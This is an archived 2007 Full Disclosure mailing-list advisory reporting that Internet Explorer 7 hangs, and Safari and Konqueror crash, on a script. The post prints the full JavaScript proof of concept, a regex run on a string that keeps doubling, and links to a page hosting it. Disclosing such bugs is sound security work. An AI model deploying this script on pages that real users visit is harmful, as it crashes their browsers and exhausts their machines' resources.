Full Disclosure mailing list archives
Internet Explorer Crash
From: "J. Oquendo" <sil () infiltrated net>
Date: Tue, 17 Apr 2007 13:09:50 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html <script> var reg = /(.)*/; var z = 'Z';while (z.length <= 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z; var boum = reg.exec(z); </script> Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government. John Adams -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (FreeBSD) iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC TCV7FOqA05H8sSDb0r8nSnk= =J/DW -----END PGP SIGNATURE-----
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Internet Explorer Crash J. Oquendo (Apr 17)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
- Re: Internet Explorer Crash Michal Majchrowicz (Apr 17)
- Re: Internet Explorer Crash Troy (Apr 17)
- Re: Internet Explorer Crash Kradorex Xeron (Apr 18)
- Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
- Re: Internet Explorer Crash Pavel Kankovsky (Apr 21)
- Re: Internet Explorer Crash cardoso (Apr 21)
- Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
- Message not available
- Re: Internet Explorer Crash Michele Cicciotti (Apr 18)
- <Possible follow-ups>
- Internet Explorer Crash carl hardwick (Apr 17)
- Re: Internet Explorer Crash 3APA3A (Apr 17)